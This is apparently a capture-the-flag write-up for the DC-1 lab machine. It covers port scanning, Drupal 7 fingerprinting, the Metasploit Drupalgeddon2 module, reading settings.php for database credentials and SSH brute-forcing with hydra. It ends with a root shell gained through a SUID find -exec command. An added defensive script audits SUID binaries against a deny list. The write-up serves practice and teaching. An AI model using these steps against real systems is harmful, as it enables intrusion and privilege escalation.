DC-1

2020-03-17

Information gathering

PORT    STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
################## ALL Port ###########################3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
...
35460/tcp open status 1 (RPC #100024)

Web directory enumeration

############# /robots.txt ################ #
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:
# Ignored: #
# For more
# http://www.robotstxt.org/wc/robots.html #
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

Visiting each path in turn gives the following information:

  • CMS: Drupal
  • Version: 7.X

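Exploitation (Getshell)

Search for known historical vulnerabilities and pick one that works; some of them fail for various reasons.

A search in MSF turns up several; pick one to use: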

use exploit/unix/webapp/drupal_drupalgeddon2

Information gathering

  • Logged-in user: www-data
  • Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
  • /etc/passwd
    • flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

flag

Listing the current directory yields one flag; a second flag is found under the flag4 user.

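flag1 hints at looking for Drupal's configuration file. A Baidu search shows that the Drupal configuration file is usually located in /var/www/sites/default/

The file name is settings.php

Search for it with find: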

find / -type f -name settings.php 2>/dev/null 
/var/www/sites/default/settings.php

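Viewing the file gives flag2 and a username/password pair. Logging in to the database gives two usernames (the third one I added myself); the passwords are encrypted, so they are of no use for now.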

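Password enumeration

flag2 mentions that brute-forcing passwords is not the only way; it probably means changing some user's password inside the database, but I did not want to go to that much trouble.

While listening to music I remembered there is also a flag4 user. Since it exists, there must be a reason for it, so I tried whether it could be enumerated.
I brute-forced ssh with hydra. Because the system was freshly installed and no password wordlist had been downloaded yet, I used john's for now, and it actually produced the password.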

Login

Log in over ssh, list the SUID binaries, and escalate privileges through find.

/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find # <---
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
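
The SUID listing above, checked from the administrator's side, as an added example that is not part of the original write-up: it triages a SUID listing against a baseline and a deny list. The baseline (the listing above minus /usr/bin/find), the deny list in classify_suid and the /opt/tools/backup-helper path are assumptions constructed for this example.

```shell
# Added example: triage SUID binaries against a baseline and a deny list.

# Assumed baseline for this example: the page's listing minus /usr/bin/find.
BASELINE="/bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/at
/usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd
/usr/bin/procmail /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs"

# classify_suid PATH -> prints critical | unexpected | expected
# Deny list (constructed, non-exhaustive): programs that start other programs,
# such as find via -exec, shells and interpreters, must never carry the SUID bit.
classify_suid() {
    case "${1##*/}" in
        find|sh|bash|dash|perl*|python*) echo critical; return 0 ;;
    esac
    case " $(echo $BASELINE) " in
        *" $1 "*) echo expected ;;
        *) echo unexpected ;;
    esac
}

# audit_suid: read one path per line on stdin (anything after the path is
# ignored) and print "LEVEL PATH" for every entry that is not expected.
audit_suid() {
    while read -r path rest; do
        [ -n "$path" ] || continue
        level=$(classify_suid "$path")
        if [ "$level" != expected ]; then
            echo "$level $path"
        fi
    done
}

# live_suid: list SUID files on the root filesystem of the current host.
live_suid() {
    find / -xdev -type f -perm -4000 2>/dev/null
}

# Constructed sample: three paths from the page's listing plus one invented path.
sample_listing() {
    printf '%s\n' /bin/su /usr/bin/passwd '/usr/bin/find # <---' \
        /opt/tools/backup-helper
}

sample_listing | audit_suid
```

On a live host, pipe `live_suid` into `audit_suid`; a critical hit is fixed by removing the bit with `chmod u-s` on that path.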

Privilege escalation

flag4@DC-1:~$ find ./ -type f -name flag4.txt -exec "whoami" \; 
root
flag4@DC-1:~$ find ./ -type f -name flag4.txt -exec "/bin/sh" \;
# cd /root
# cat thefinalflag.txt

With root obtained, the other flags no longer matter.

flag
flag2
flag4
thefinalflag.txt